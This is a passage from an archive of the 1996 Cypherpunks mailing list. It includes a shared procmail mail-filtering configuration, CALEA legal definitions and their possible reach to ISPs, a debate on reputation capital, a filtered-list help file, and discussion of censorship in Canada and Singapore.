6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 5 Sep 1996 10:40:05 +0800
To: janzen@idacom.hp.com
Subject: Re: How to use procmail
In-Reply-To: <9609042045.AA27973@sabel.idacom.hp.com>
Message-ID: <199609050006.TAA07462@homeport.org>
MIME-Version: 1.0
Content-Type: text


Martin Janzen wrote:

| New procmail users, listen to Adam!  (And read the man page, even
| though it's a bit intimidating at first.)

Yeah, Listen to me! Listen to me! (Its the new cypherpunks theme
song!)

More seriously, here's my .procmailrc.  I'm fond of it, but the cpunks
section could use some more work.  Other parts may be useful basis
for other people's hacking.

Adam

# $Id: .procmailrc,v 1.10 1996/08/05 04:54:46 adam Exp $
PATH=/bin:/usr/bin:/usr/local/bin:/usr/local/lib/mh
MAILDIR=$HOME/Mail/=      	#you'd better make sure it exists
DEFAULT=/var/spool/mail/adam
LOGFILE=$MAILDIR/.procmail.log
REALLF=$LOGFILE			# So I only have one path to LF
COMSAT=no			# don't tell comsat; its obstelete.
# VERBOSE=on		# bad bad bad!


#This first ruleset protets me from mailbombs from an automated service
#that I often send incorrect commands to, generating 5mb of reply.
# It also sorts based on sucsess of the command.

:0c :
.safe

:0
* From bal@swissnet.ai.mit.edu
{
   :0 h
   * >10000
   /dev/null

   :0 h
   *^Subject:.*no keys match
   /dev/null

   :0:
   *Subject: Your command, ADD
   $DEFAULT


   :0E
   | pgp +batchmode -fka
}


# This is a backup. Don't forget to cycle safe boxes.


# this is here because I don't want to hear about everything going in .safe.
# prevent duplicate messages from showing up in several folders.

LOGABSTRACT=all
# doesn't work
:0 Wh: msgid.lock
| formail -D 65536 .msgid.cache

# auto key retreival
#
# I have an elm alias, pgp, points to a keyserver
# The logfile gets unset briefly to keep the elm lines out of my
# logfile.

:0BW
* -----BEGIN PGP
*!^FROM_DAEMON
KEYID=|/home/adam/bin/sender_unknown

LOGFILE=

:0 ahc	# added h 8 jan 95
* ! ^X-Loop: Adams autokey retreival.
| formail -a"X-Loop: Adams akr" |elm -s"mget $KEYID" pgp



LOGFILE=$REALLF

:0
* (^TOCypherpunks|Sender:.*cypherpunks|^From owner-cypherpunks@toad.com)
{
   :0:
   * From.*owner-cp-lite@comsec.com
   cp-lite

   :0 h
   * Subject:.*(Delete|u*n*Sub*| add |leave|help|Undeliverable Message)
   * < 1000
   /dev/null
   
   :0 :rml.lock
   * ^From: Raph Levien
   * ^Subject: List of reliable remailers
   | cat /dev/null - > ~/sec/remailer-list

   :0:
   * 1^1 ^(From|To|Cc):.*david@sternlight.com
   * 1^1 ^Subject:.*CDA
   * 1^1 ^Subject:.*Assasination
   * 1^1 ^Subject:.*Reasons in support of crypto-anarchy
   * 1^1 ^Subject:.*Noise
   * 1^1 ^Subject:.*FV
   * 1^1 ^Subject:.*(PLEASE REPLY|test)
   cjunk


   :0B:
   * ^Alice de 'nonymous
   * an455120@anon.penet.fi
   * ^P.S.  This post is in the public domain.
   | formail -a "Status: O" >> cjunk



# I really ought to make this a wieghted rule.
   :0:
   * ^From:.*(aba@atlas|adam@lighthouse|blancw|cdodhner|cfrye|chen|cman|cme|colin@|daw@cs|ddt|ebrandt|eric@remail|futplex|frissell|gnu|gtoal|habs|hallam|hfinney|hugh|jis|karn|loewenste|loki|mab|froomki|mpj|nate|nsb|perry|pfarrel|rah|rjc|rsalz|sameer|sandfort|schneier|ses|smb|stewarts|szabo|tcmay|trei|unicorn|usura@berserk|warlord|weidai|whitaker|Zimmerman)
   * !^From.*(anonymous|perry@jpunix.com|jonathan@Memexis|perry@psii.persci.com|gertstein|Schartman|don@cs.byu.edu|senate.gov|doug@eng)
   cpunks

   :0:
   cpunks-noise
}
:0:
* ^TOfirewalls
firewalls


:0:
*^From owner-fwtk-users@tis.com
fwtk

:0
*^TOcyberia-l
{
#   VERBOSE=on

   :0 HW
   FROM=|formail -x "From: "

   :0 f
   | formail -I"Reply-To: $FROM"

   :0 fw:cyberia.sed.lock
   * ^From: Timothy Arnold-Moore <tja@kbs.citri.edu.au>
   |sed 's/^ //g'

   :0:
   cyberia
}

:0:
* ^From procmail-request@informatik.rwth-aachen.de
procmail


# Thats it for the high volume lists.  Low volume lists I don't push
# through formail.

:0:
* ^TOyucks@cs.purdue.edu
* ^Subject: Yucks Digest
| formail +1 -ds cat >> yucks

:0:
* ^TObugtraq
bugtraq

:0
* ^TO .*(ietf|rfc-dist)
{
   :0h
   *^Subject:.*ON-SITE
   /dev/null
 
   :0:
   ietf
}


:0
* ^TOwww-buyinfo
{
   :0
   * ^From: rah@shipwright
   * ^Subject: .*(cpx)
   /dev/null

   :0:
   | formail -a "Status: O" >> wwwb
}

:0:
*^TOspki
spki

:0
*^TOssl-talk
{
   :0
   *^Subject:.*remove
   * < 2000
   /dev/null

   :0:
   ssl
}

:0:
*^TOwww-security@ns2.rutgers.edu
wwws

:0:
*^From owner-ssh
ssh


:0:
*^TOremailer-operators@c2.org
remailers

:0:
*From best-of-security
bos


:0:
* ^TObblisa
bblisa

:0:
*^TOcoderpunks
coderpunks


:0:
*^TOmix-l
mix-l

:0:
* ^TOphrack
v/phrack

:0:
*^TOsdadmin
sdadmin

:0:
* Precedence: (junk|bulk)
junk

:0:
* To: postmaster
postmaster

# basic file server.  Only sends whats in .outbound
:0 
* ^Subject: (SEND|get) [0-9a-z][-_/0-9a-z.]+$
* !^Subject:.*[ /.]\.
* !^FROM_DAEMON
{
   # FILE=`formail -x Subject: | sed 's/.* //'`
   FILE=`sed -n -e '/Subject:/s/.* //p' -e '/^$/q'`

  :0c 
  | (formail -rt -A"Precedence: junk";\
     cat $HOME/.outbound/$FILE) | $SENDMAIL -t

  :0: 
  $MAILDIR/.log
}


# This handles vacation messages.  Make sure .vacation.msg and
# .vacationlist exist

:0 hc:vaction.lock 	#  untested
* ?  [ -r $MAILDIR/.vacationlist ]
* !? [ -r $MAILDIR/.vacation.msg ]
| rm -f $MAILDIR/.vacationlist


:0
* ? [ -s $MAILDIR/.vacation.msg ] 
* !^Precedence:(junk|bulk)
* !^FROM_DAEMON
{
 FROM=`formail -rx To:`
 ALREADYSENT=$MAILDIR/.vacationlist
   :0 hc:
   * !? fgrep -e "$FROM" $ALREADYSENT
   | echo "$FROM" >> $ALREADYSENT;\
 	(formail -rA"Precedence: junk";\
	cat $MAILDIR/.vacation.msg ;\
   ) | $SENDMAIL -t
}





-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Thu, 5 Sep 1996 13:49:50 +0800
To: stewarts@ix.netcom.com
Subject: Digital Telephony and the Net
In-Reply-To: <9609042054.AB16740@anchor.ho.att.com>
Message-ID: <Pine.SUN.3.91.960904191928.14783G-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


It's late and I'm about to go home, but my search through the text of the
Digital Telephony legislation comes up with the attached definitions the
law uses. 

If I were, say, Jason "The Weasel" Baron (who's my fave DoJ attorney) and
I wanted to really screw over some netizens, I might try to argue that an
ISP should be a "telecommunications carrier." If the FCC bought my
argument and thought that an ISP could in some cases substantially replace
telephone service, then DT would apply to ISPs. 

Then ISPs must -- at the request of "authorized" Feds acting even without
a warrant -- cough up all data coming to and from a person on their system. 

I'm probably wrong here and I hope I am, so I'm copying this to Marc who
can point out the holes in my reasoning. 

-Declan



// declan@eff.org // I do not represent the EFF // declan@well.com //


            (4) The term `electronic messaging services' means
              software-based services that enable the sharing of data, 
              images, sound, writing, or other information among computing
              devices controlled by the senders or recipients of the messages.

   (6) The term `information services'--
                    (A) means the offering of a capability for generating,
                  acquiring, storing, transforming, processing, retrieving,
                  utilizing, or making available information via
                  telecommunications; and
                    (B) includes--
                        (i) a service that permits a customer to retrieve
                      stored information from, or file information for 
                      storage in, information storage facilities;
                        (ii) electronic publishing; and
                        (iii) electronic messaging services; but

    (8) The term `telecommunications carrier'-- [...]
    (ii) a person or entity engaged in providing wire or
                      electronic communication switching or transmission
                      service to the extent that the Commission finds that
                      such service is a replacement for a substantial portion
                      of the local telephone exchange service and that it is
                      in the public interest to deem such a person or entity
                      to be a telecommunications carrier for purposes of this
                      title; but

 (C) does not include--
                        (i) persons or entities insofar as they are engaged 
                      in providing information services; and
                        (ii) any class or category of telecommunications
                      carriers that the Commission exempts by rule after
                      consultation with the Attorney General.

  SEC. 103. ASSISTANCE CAPABILITY REQUIREMENTS.
            (a) Capability Requirements: Except as provided in subsections
          (b), (c), and (d) of this section and sections 108(a)  and 109(b)
          and (d), a telecommunications carrier shall ensure that its
          equipment, facilities, or services that provide a customer or
          subscriber with the ability to originate, terminate, or direct
          communications are capable of--
                (1) expeditiously isolating and enabling the government,
              pursuant to a court order or other lawful authorization, to
              intercept, to the exclusion of any other communications, all
              wire and electronic communications carried by the carrier 
              within a service area to or from equipment, facilities, or
              services of a subscriber of such carrier concurrently with 
              their transmission to or from the subscriber's equipment,
              facility, or service, or at such later time as may be 
              acceptable to the government;





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 5 Sep 1996 16:14:41 +0800
To: Declan McCullagh <declan@eff.org>
Subject: Re: What is the EFF doing exactly?
Message-ID: <199609050305.UAA08601@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:13 PM 9/4/96 -0700, Declan McCullagh wrote:
>On Wed, 4 Sep 1996, jim bell wrote:
>> Why WOULDN'T the police want to shut down anonymous remailers?  The Leahy 
>> bill clearly didn't distinguish between remailer operators and users, so it 
>> is no leap to conclude that they would be treated similarly.
>
>Why *wouldn't* the police want to shut 'em down? Because the police
>respect the Constitution and our civil liberties, of course, and realize
>and respect the value of anonymous political speech. 


"Hey, man, whatever you'se been smoking, could'ja give me a joint or two?"
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gregburk@netcom.com (Greg Burk)
Date: Thu, 5 Sep 1996 12:34:19 +0800
To: cypherpunks@toad.com
Subject: Re: Reputations
Message-ID: <gfd546wwa9@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
tcmay@got.net (Timothy C. May) writes:
> Briefly, think of "restaurants" when thinking about reputations. If one
> arrives in a new city, most restaurants may have the same baseline
> reputation, e.g. "none." A few may be known by name, for their
> "reputation," either good ("You have to eat at Louie's--the laser chicken
> is incredible") or bad ("Blecch!). Positive reputations and negative
> reputations are self-explanatory. And the reputations of others may affect
> the reputations of restaurants ("John Gilmore says he likes the Burma
> Burger on Castro Street."). Bad recommendations may affect the "reputation
> capital" of John, for example. (We speak of "reputation capital" because it
> can in some sense be "spent.")
 
That part of the "reputation capital" theory has always seemed
suspicious to me. "reputation capital" doesn't behave linearly. There's
too much incentive to bottom-feed and too little incentive to shoot for
the heights. As an "asset", it is extremely non-liquid. It is hard to
spend it in a controlled manner.
 
 
Too much incentive to bottom-feed:
 
For example, let's say there's someone well-known who frequently speaks
nonsense on crypto issues. We'll call her "Norothy Nenning". She makes a
recommendation on some particular crypto issue, say "The government's
Nipper chip is a safe and effective form of crupto". Plenty of naive
people will credit her to some degree. True, fewer people than if she
had carefully husbanded her reputation, and to a lesser degree, but
still a lot more than zero.
 
Notice that that's a zero cost/benefit ratio. She never does anything to
husband her reputation, she just spends it every chance she gets. And
while no single expenditure rewards her as much as it would if she made
the same expenditure with a good reputation, she spends so much more
freely that it is a good strategy for her on the whole.
 
"Reputation capital" is hard to spend down to absolute 0 because it is
significant work to distinguish valid "reputation capital" from
worthless counterfeit, and it is easy to counterfeit... just talk.
 
I anticipate the answer "Well, the work pays off". But that misses the
point. Frequently the work required to tell the good "reputation
capital" from the worthless is as much as would be required to find the
straight dope yourself.
 
 
 
Too little incentive to shoot for the heights:
 
Suppose you judge that you've accumulated twice as much "reputation
capital" as Joe. How do you get twice as much payoff? It seems to me
that above the threshhold of credibility, minor side issues make more
difference than your two-fold "reputation capital" differential.
 
 
 
As an "asset", it is extremely non-liquid:
 
How exactly would you "convert" your reputation into other capital?
Would you accept bribes and tell lies? Seems to me you would only get a
one-shot "conversion" and it couldn't possibly hope to equal your
investment.
 
As soon as you leave the information-broker business, you discover that
your "asset" cannot be converted, sold, auctioned off, or much of
anything else of value to you.
 
 
 
It is hard to spend it in a controlled manner:
 
See above. The single bribe-and-lie will spend your "reputation capital"
down to below the threshhold of credibility, no matter how much you
started with.
 
Human discourse often tends to be absolutist. It is often very difficult
to make people understand and retain a message of partial support or
qualified support. Particularly on hot issues. Restaurants, sure, you
can give 1 to 5 stars, but in many subject areas there is no such
system. And any system you yourself invent tends to be ignored.
 
 
 
So I think the latter part of the analysis is wishful thinking, or at
least restricted to a small subset of subject-matter.
 
 
 
 
 
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
 
iQBVAwUBMi4omrMyVAabpHidAQGGPAIAizIOktCC4B5gtVYPblaTi9FL6ZtwTfkP
sAFHT626mMLz1f/ZKa2SLq3pdag09ACCklJLJ1djFwSFP4bvoijMfw==
=rFti
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 5 Sep 1996 12:41:18 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <199609041827.LAA29523@netcom20.netcom.com>
Message-ID: <Pine.SUN.3.94.960904201419.16143B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 4 Sep 1996, Vladimir Z. Nuri wrote:

> 
> jim bell <jimbell@pacifier.com>
> >"Addressed", maybe, but that doesn't necessarily mean, "solved."  For many 
> >decades, people have been able to walk up to a pay telephone at 3:00 AM and 
> >make a harassing phone call to somebody, a "problem" which still exists and 
> >no solution is being implemented for.

Incidently, this is being "solved."

In D.C. and Chicago the solution is to rip up the payphones and not permit
new ones to be installed.

If anyone objects the officals responsible make a wide gesture and say "We
didn't take away your phones, CRIMINALS took away your phones."

> amusing the way you phrase that-- you didn't say, "phone", but "pay 
> phone". the statement used to hold in general for all "phones", but
> then caller id, caller blocking, etc. have been introduced that
> make this no longer true. so in a very real sense, anonymity in 
> the phone system was considered a "problem" by some that has been
> "solved" or "modified" by some recent advancements. (yes, most people
> agree caller ID is an advancement).
> 

Yet today one can go out and rent a cell phone on the street, or even pay
for one's activation in cash up front without presenting any real identity
documents.

The real question is this, what are you going to do to anihilate anonymous
communication, because if you think its harmful that's what you have to
do.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 5 Sep 1996 12:52:35 +0800
To: youssefy@ucla.edu
Subject: Cypherpunks Lite Info Here.
In-Reply-To: <2.2.32.19960828225105.006ccc74@pop.ben2.ucla.edu>
Message-ID: <Pine.SUN.3.91.960904201925.5415B-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 28 Aug 1996 youssefy@ucla.edu wrote:

> There was a posting by someone about three weeks ago that gave the address
> for a person who ran a filtered version of the cypherpunks list, can someone
> please repost that information?


Very well, I will be lazy, and post the info out of my help file.  Enjoy. :)

Help is here! 

Hi there, as requested, here's some info about the filtered cypherpunks
list which I run (by hand with the help of a couple of mailbots)

This list is NOW running from: sunder@brainlink.com.

Basically, I use the 'bots to keep the list of recipients, then forward
any message to this list of usernames which I find interesting, and
usually noise-free... 

Since, I do this by hand, AND since there is no majordomo mailing list
software, and since I get a lot of mail, it's a good idea to make sure the
subject of any messages you send to me stand out.  i.e. make the subject
line: 
 
    "***000 Personal junk mail for the human, not the bots ***"

(The 0's are there to make sure that when Pine sorts the messages on this 
side, they come up on top, making sure I'll see them immediatly.)

There is no automated filtering of any sort...   Whatever message I find 
to be interesting, news-worthy, or technical (theoretical crypto, actual 
code, etc) gets handed over to the bots, which send it to this list.

If you use some sort of filtering program to move messages to a folder, 
look for the string "FCPUNX:" (without quotes) in the subject field.
 
There will usually be a propagation delay of one day to a week days -
sometimes as long as two weeks between the messages on the actual
cypherpunks list, and this filtered one.  This is because I may not always
get the chance to log in every day, and also because I may have to wade
through tons of noise/spam/flames from the real list. :-)

Occasionally, if I see something interesting from another list (such as
Cyber Rights, coderpunks, etc) I will forward it here if I feel that it
pertains to Cypherpunk interests, or that you'd like to see it. 

You should unsubscribe yourself from the real list by sending an
"unsubscribe cypherpunks" message to majordomo@toad.com - that is send a
message with no subject and just that single line - no signature either,
so as to unsubscribe.  - Unless you wish to continue to receive messages
from the real list as well as copies of those messages from here. :-)

All filtering is again according to my whims so if you dislike what I 
send you, sorry.  I might eventually work something out where this list 
will be broken up into many tiny lists so you'd subscribe to whatever 
subjects you're interested in.

This is a free service, no strings attached, just tons o'mail, but less 
mail than the unfiltered list...

Also note that the bots I run may sometimes be slightly buggy and may do 
unexpected weird things.  Appologies in advance if this happens.  But 
please by all means do report any such runaway bot occurances.

If you wish to unsubscribe yourself from this list, just send a message 
with the subject "unsubscribe fcpunx" (no quotes) and the next time I log 
in, one of the bots will handle the ubsubscribe.

You can re-subscribe yourself as many times as you like, you'll only get
one copy of each message, but as many copies of the request response as
you've sent.The 'bots hone in on your address and send mail only there, so
subscribe yourself from whatever account you want to receive mail. 

If by accident you subscribe from two different machines, the bots won't 
know the difference and you'll get two copies of each filtered message, 
so be careful.

This also means that you can only unsubscribe yourself from the same
address you subscribed from.

To get help, send a message with the subject "help fcpunx."

To subscribe yourself (if you see this, you are subscribed) send a 
message with the *SUBJECT* "subscribe fcpunx"

NOTE: THE BOTS ONLY RESPOND TO THE SUBJECT LINE, NOT TO TEXT IN THE BODY 
OF YOUR MESSAGE!

The bots only look at your message's subject and your mailing address so 
it doesn't matter what you put in the body.

Whenever the 'bots honor a request from you, you'll see a response mailed 
from them (under my name.)

Since the bots are only active when I log in and run them by hand, the 
message acknowledging your request may take several days to get to you.

*ALL COMMANDS MUST BE SENT IN THE SUBJECT OF THE MESSAGE!  The body 
(text) of the message are ignored.

Commands available:

 subscribe fcpunx           - subscribes you to the list and you are 
                              visible to fcpunx who requests
 subscribe invisible fcpunx - subscribe but don't let others know

 digest fcpunx              - receive the digest version (visibly)
 digest invisible fcpunx    - receive the digest invisibly

 unsubscribe fcpunx         - unsubscribe from the list or digest
 undigest fcpunx

 who fcpunx                 - receive a list of (visible) subscribed users

 help fcpunx                - sends a help file (you're looking at it)

If you're already subscribed to the list and want to switch to the digest 
version, you can do this by sending a digest fcpunx message; the reverse 
is also true.  Notice that you cannot subscribe to both the digest and 
the list.  Sorry.  If you'd like that feature either use two different 
accounts to receive them, or complain to me and I'll add it in.

The unsubscribe and undigest commands do the same thing, they take you 
off the list no matter which version you're subscribed to.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to   |KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK   |AK|        do you not understand?       |=======
===================http://www.brainlink.org/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 5 Sep 1996 13:15:02 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <Pine.SUN.3.94.960904160701.1787A-100000@polaris>
Message-ID: <Pine.LNX.3.93.960904201541.571A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 4 Sep 1996, Black Unicorn wrote:
> [This will be my last comment on this thread.]
> On Tue, 3 Sep 1996, Vladimir Z. Nuri wrote:
> > >I would put forth that you know nothing of my efforts, and therefore are
> > infrantry will experience. if you expect unadulterated success,
> > you're not living in the same reality everyone else around here
> > is.
> 
> If you're going to ask me for money and support, you damn well better
> produce unadulterated success.

     I disagree with this. No one produces unadulterated sucess. Ever.

     You win some, you lose some. As long as you fight as hard as possible,
and DO NOT COMPROMISE, then that is enough. 

     Other than that, I concur.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Thu, 5 Sep 1996 14:10:52 +0800
To: cypherpunks@toad.com
Subject: Re: Mail OnNet
Message-ID: <2.2.32.19960905032606.0074c024@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:06 AM 9/4/96 -0700, Alan Olsen wrote:
>At 05:10 PM 8/31/96 -0700, Joel McNamara wrote:
>
>>Two notes.  (1) It only runs under Win95 and NT.  (2) It's ITAR restricted.
>
>(3) It is bigger than a battleship.  The distribution is just shy of 10
>megs.  Installed it is supposed to be about 45 megs.  (In perspective, a
>full install of Visual Basic 4.0 "Professional" is about 50 megs.) 
>---


The install is only 5MBs. Part of that 10MB package is a silly collection of
netscape plugins which don't have to be installed. I guess they could be
nice if I tried them.

It also only works on NT4 regardless of what the web page says.

With it's ability to run a program on receiving an email based upon filter
criteria the possibilities are endless. (I know I know old hat for unix but
so whiz bang for NTnoids like me.)

--j






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 5 Sep 1996 14:14:05 +0800
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
Message-ID: <199609050327.UAA06817@dfw-ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:13 PM 9/2/96 -0400, you wrote:

>> (This was done by many of us during the Karla Homulka and Teale trial in
...
>There is a big difference between the Canada situation and the Singapore
>situation. In Canada the restrictions are temporary and stem from making
>the right to a fair trial a higher priority than the right to free
>speech.
>It is a conflict of two competing individual liberties. No observer of
.....
>The situation in Sigapore is simply a corrupt government trying to
>supress
>legitimate democratic discussion. The intention is not to protect an 
>individuals right to a fair trial, the intention is to restrict argument
>permanently.

The Karla Homulka case and other criminal trials aren't the only
censorship in Canada - there are far more serious problems.
Zundel's problems (his legal ones, not just his moral ones) are well-known,
as are the Dworkin/MacKinnon-inspired anti-pornography laws which
Canada uses to censor lesbian bookstores and gay magazines.
For the most part, other than sex and drugs, Canada's censorship is the
pro-human-rights-politically-correct-liberal-hypocritical variety 
rather than the Singapore-style anti-human-rights-order-enforcing-
politically-correct-dictatorship variety.  

But it's not only illegal to sell unapproved drugs in Canada, 
it's illegal to sell materials advocating drugs or their legalization, 
or of course information on how to make or grow drugs as well.  
(This helped Mark Emery get the capital to start his Hemp store in 
Vancouver by selling Cannabis magazines door-to-door :-)
(It turns out that, since hemp seeds don't contain THC, they're not
illegal in Canada, and hemp stores he's started or encouraged
have sold enough seeds to grow more dope than Canada's police have
confiscated in the last year or two.  Mark openly violates the
censorship laws, and his shop occasionally gets raided, and after
the last bust they've decided he's a co-conspirator with everybody
who's grown drugs using seeds or light bulbs bought from him,
and they're playing a FUD game about whether to charge him
with 8 life sentences, in under-5-year pieces....)

Vancouver newspaper columnist Doug Collins gave a talk on censorship at an
international libertarian conf. in BC recently, which Emery also spoke at.  
He knows the subject fairly well, since some of BC's censorship laws were 
written just for him.  He's one of those anti-immigrant anti-Semitic* 
WW2-veteran curmudgeons who's got an editor who lets him write whatever he 
wants, and he offends a lot of people.  In BC, and to some extent in
the rest of Canada, you can be charged with human rights violations
for disparaging ethnic and religious groups, and he's been tried
and defended himself successfully for that, because Canada does have
some limited protections for free speech in their Charter.  So BC wrote a law
that allows the BC human rights commission to fine people for human
rights violations with just an administrative proceeding,
not requiring a full-scale trial, and you generally can't get a jury
in Canada for crimes with punishment less than 5 years in jail anyway.
He hasn't been busted under the new law yet, but his publisher has
spent about $30K in legal costs trying to make sure it doesn't happen.
        [*He knew better than to specifically say anything anti-Semitic
          while he was talking to us, but he referred to Jewish groups
          that oppose him in ways that implied he probably was.]

And of course Canada has broadcasting licensing requirements
that prevent people from starting radio and TV stations whenever they
want to, plus a huge government broadcasting company, but they're not
as limited as Singapore on that, and there are other countries with
that problem.  And of course they have silly language laws in Quebec,
but they don't really limit what you can say as long as you say it
in French (or Chinese or Vietnamese or just about anything except English
and maybe Native languages.)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 5 Sep 1996 14:44:42 +0800
To: cypherpunks@toad.com
Subject: Re: Reputations
Message-ID: <ae5392e4070210049904@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:11 AM 9/5/96, Greg Burk wrote:

>That part of the "reputation capital" theory has always seemed
>suspicious to me. "reputation capital" doesn't behave linearly. There's
>too much incentive to bottom-feed and too little incentive to shoot for
>the heights. As an "asset", it is extremely non-liquid. It is hard to
>spend it in a controlled manner.

Sure, it isn't fungible, it isn't transitive, it isn't neat and clean.

But it's the best thing we've got, imperfect as it is (and must be, I believe).

>Too much incentive to bottom-feed:
>
>For example, let's say there's someone well-known who frequently speaks
>nonsense on crypto issues. We'll call her "Norothy Nenning". She makes a
>recommendation on some particular crypto issue, say "The government's
>Nipper chip is a safe and effective form of crupto". Plenty of naive
>people will credit her to some degree. True, fewer people than if she
>had carefully husbanded her reputation, and to a lesser degree, but
>still a lot more than zero.
>
>Notice that that's a zero cost/benefit ratio. She never does anything to
>husband her reputation, she just spends it every chance she gets. And
>while no single expenditure rewards her as much as it would if she made
>the same expenditure with a good reputation, she spends so much more
>freely that it is a good strategy for her on the whole.

To stick with my restaurant example, consider _advertising_. MacDonald's
and Burger King spend hundreds of millions of dollars every year claiming
their "restaurants" are great. Many millions of people obviously are
swayed. So?

Others choose not to trust the advice of the MacDonald's hucksters. Maybe
only a tiny fraction choose Chez Panisse over MacDonald's. This is the way
of the world.

It's still the give and take of reputations. It ain't perfect (in that it
doesn't produce results I believe are empirically valid and optimum :-}).
But it's all we have. It's the market. The agora.

>"Reputation capital" is hard to spend down to absolute 0 because it is
>significant work to distinguish valid "reputation capital" from
>worthless counterfeit, and it is easy to counterfeit... just talk.

I strongly disagree. It's quite possible for Person A to quickly convert
his reputation to Person B to a _negative_ value. Real quick, in fact.

Perhaps my short article did not fully explain a few things. Reputations
are a _tensor_ or _matrix_ quantity. Person A has a reputation R(A,B) to
Person B, a reputation R(A,C) to Person C, and so on. (And the matrix may
be further broken down into reputations for advice on various subjects, in
various fields, etc.)

We may lump a lot of folks together and say, for example, that MacDonald's
has a reputation of R (MacDonald's, lots of people) = 0.7531. And perhaps R
(Chez Panisse, lots of people) = 0.0013 (i.e., they don't know what it is,
and so value the rep of Chez Panisse at near zero).

And so on. Lots of examples could be given.

Now suppose that J. Anonymous Gourmand announces that MacDonald's is shit.
How much will anonymous claim hurt MacDonald's? Obviously, not much. But
what if the American Heart Association publishes a detailed study on the
fat levels of MacDonald's products and declares it to "Dangerous." The
effect will probably be greater, as R (AHA, many people) = high, and by the
kind of Dempster-Shafer belief calculus I discussed a few months ago, the
rep of the AHA propagates semi-transitively to the rep of MacDonald's.

(This all happened recently, with the famous studies of fat levels of movie
theater food...sales dropped almost overnight, and now the fat levels of
popcorn, etc., have been changed for the better.)

This is a real example of how reputations matter, how negative and positive
reps matter, etc. Note especially that the "identity" (in the Dyson sense
of providing True Name accountability) of an opinion-giver is not what it
is important...it is not the essence of why people believe or don't believe
the opinions of others.

(Some years ago on the CBS station in San Francisco, there was an
"anonymous gourmet" who visited restaurants and gave reviews. His reviews
were taken quite seriously, and his anonymity did not matter, provided his
personna was _persistent_. That is, provided that people thought it was
"the guy they had come to trust," and not, say, a guy the station recruited
off the street each day and sent out as the "anonymous gourmet." In the
case of this guy, his face was cloaked in shadows, but his voice was
distinctive. (His voice on the show was probably different from his
food-ordering voice, so restaurants would not know who was ordering and
alter the food or service.) Much could be written abou the role of
anonymity in such reviews, in tests of service, etc.)

>I anticipate the answer "Well, the work pays off". But that misses the
>point. Frequently the work required to tell the good "reputation
>capital" from the worthless is as much as would be required to find the
>straight dope yourself.

Reputations work OK for me in the real world. Given the limits on a lot of
ontological facts, hard to see how it could be better.

I've already spent too much time writing this, so I can't address the
remainder of your points.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Squirrel Remailer <mix@squirrel.owl.de>
Date: Thu, 5 Sep 1996 08:13:35 +0800
To: Cypherpunks@toad.com
Subject: No Subject
